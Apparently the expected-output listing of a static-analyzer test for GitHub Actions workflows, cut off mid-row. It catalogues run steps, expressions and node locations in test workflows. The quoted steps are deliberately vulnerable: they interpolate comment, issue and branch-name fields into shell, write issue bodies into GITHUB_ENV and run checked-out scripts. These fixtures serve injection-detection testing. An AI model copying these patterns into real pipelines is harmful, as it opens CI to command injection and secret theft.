Run Step | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | -| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | -| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | -| 
.github/workflows/multiline.yml:58:9:63:6 | Run Step | -| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | -| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | -| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | -| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | -| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. 
venv/bin/activate | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile 
js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| 
.github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | -| .github/workflows/test.yml:32:5:40:53 | Job: job2 | -| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | -| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | -argumentNodes -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | -usesIds -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | -| 
.github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | -nodeLocations -| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | -| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | -| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | -| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | -| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | -| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | -| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | -| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | -| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | -| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | -| 
.github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | -| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | -| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | -| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | -| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | -| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | -| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | -| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | 
.github/workflows/expression_nodes.yml@19:24:19:55 | -| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | -| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:9:5:89:35 | .github/workflows/multiline2.yml@9:5:89:35 | -| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:9:15:6 | .github/workflows/multiline2.yml@11:9:15:6 | -| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:14:33:14 | .github/workflows/multiline2.yml@30:14:33:14 | -| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:32:13:32:39 | .github/workflows/multiline2.yml@32:13:32:39 | -| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:9:40:6 | .github/workflows/multiline2.yml@34:9:40:6 | -| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:35:14:39:14 | .github/workflows/multiline2.yml@35:14:39:14 | -| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:9:46:6 | 
.github/workflows/multiline2.yml@40:9:46:6 | -| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:41:14:45:14 | .github/workflows/multiline2.yml@41:14:45:14 | -| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:9:52:6 | .github/workflows/multiline2.yml@46:9:52:6 | -| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:47:14:51:14 | .github/workflows/multiline2.yml@47:14:51:14 | -| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:9:58:6 | .github/workflows/multiline2.yml@52:9:58:6 | -| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:53:14:57:14 | .github/workflows/multiline2.yml@53:14:57:14 | -| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:9:63:6 | .github/workflows/multiline2.yml@58:9:63:6 | -| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:59:14:62:14 | .github/workflows/multiline2.yml@59:14:62:14 | -| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:9:66:6 | .github/workflows/multiline2.yml@63:9:66:6 | -| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:64:14:65:142 | .github/workflows/multiline2.yml@64:14:65:142 | -| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:9:71:6 | .github/workflows/multiline2.yml@66:9:71:6 | -| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> 
$GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | -| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | -| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | -| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | -| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | -| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | -| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | -| .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:30:9:34:6 | .github/workflows/multiline.yml@30:9:34:6 | -| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | -| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | -| .github/workflows/multiline.yml:34:9:40:6 | Run Step | .github/workflows/multiline.yml:34:9:40:6 | 
.github/workflows/multiline.yml@34:9:40:6 | -| .github/workflows/multiline.yml:35:14:39:14 | cat >> $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:35:14:39:14 | .github/workflows/multiline.yml@35:14:39:14 | -| .github/workflows/multiline.yml:40:9:46:6 | Run Step | .github/workflows/multiline.yml:40:9:46:6 | .github/workflows/multiline.yml@40:9:46:6 | -| .github/workflows/multiline.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:41:14:45:14 | .github/workflows/multiline.yml@41:14:45:14 | -| .github/workflows/multiline.yml:46:9:52:6 | Run Step | .github/workflows/multiline.yml:46:9:52:6 | .github/workflows/multiline.yml@46:9:52:6 | -| .github/workflows/multiline.yml:47:14:51:14 | cat << EOL >> $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline.yml:47:14:51:14 | .github/workflows/multiline.yml@47:14:51:14 | -| .github/workflows/multiline.yml:52:9:58:6 | Run Step | .github/workflows/multiline.yml:52:9:58:6 | .github/workflows/multiline.yml@52:9:58:6 | -| .github/workflows/multiline.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline.yml:53:14:57:14 | .github/workflows/multiline.yml@53:14:57:14 | -| .github/workflows/multiline.yml:58:9:63:6 | Run Step | .github/workflows/multiline.yml:58:9:63:6 | .github/workflows/multiline.yml@58:9:63:6 | -| .github/workflows/multiline.yml:59:14:62:14 | cat <<-EOF >> "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline.yml:59:14:62:14 | .github/workflows/multiline.yml@59:14:62:14 | -| .github/workflows/multiline.yml:63:9:66:6 | Run Step | .github/workflows/multiline.yml:63:9:66:6 | .github/workflows/multiline.yml@63:9:66:6 | -| .github/workflows/multiline.yml:64:14:65:136 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') >> $GITHUB_ENV\n | .github/workflows/multiline.yml:64:14:65:136 | 
.github/workflows/multiline.yml@64:14:65:136 | -| .github/workflows/multiline.yml:66:9:71:6 | Run Step | .github/workflows/multiline.yml:66:9:71:6 | .github/workflows/multiline.yml@66:9:71:6 | -| .github/workflows/multiline.yml:67:14:70:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/multiline.yml:67:14:70:36 | .github/workflows/multiline.yml@67:14:70:36 | -| .github/workflows/multiline.yml:71:9:78:6 | Run Step | .github/workflows/multiline.yml:71:9:78:6 | .github/workflows/multiline.yml@71:9:78:6 | -| .github/workflows/multiline.yml:72:14:77:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:72:14:77:29 | .github/workflows/multiline.yml@72:14:77:29 | -| .github/workflows/multiline.yml:78:9:85:6 | Run Step | .github/workflows/multiline.yml:78:9:85:6 | .github/workflows/multiline.yml@78:9:85:6 | -| .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | -| .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | -| .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:46:111 | .github/workflows/poisonable_steps.yml@5:5:46:111 | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses 
Step | .github/workflows/poisonable_steps.yml:8:9:13:6 | .github/workflows/poisonable_steps.yml@8:9:13:6 | -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:11:53:11:75 | .github/workflows/poisonable_steps.yml@11:53:11:75 | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:14:13:32 | .github/workflows/poisonable_steps.yml@13:14:13:32 | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:14:14:42 | .github/workflows/poisonable_steps.yml@14:14:14:42 | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:14:15:41 | .github/workflows/poisonable_steps.yml@15:14:15:41 | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. 
venv/bin/activate | .github/workflows/poisonable_steps.yml:16:14:16:42 | .github/workflows/poisonable_steps.yml@16:14:16:42 | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:14:17:32 | .github/workflows/poisonable_steps.yml@17:14:17:32 | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:14:18:36 | .github/workflows/poisonable_steps.yml@18:14:18:36 | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:14:19:44 | .github/workflows/poisonable_steps.yml@19:14:19:44 | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:14:20:56 | .github/workflows/poisonable_steps.yml@20:14:20:56 | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:14:21:56 | .github/workflows/poisonable_steps.yml@21:14:21:56 | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | 
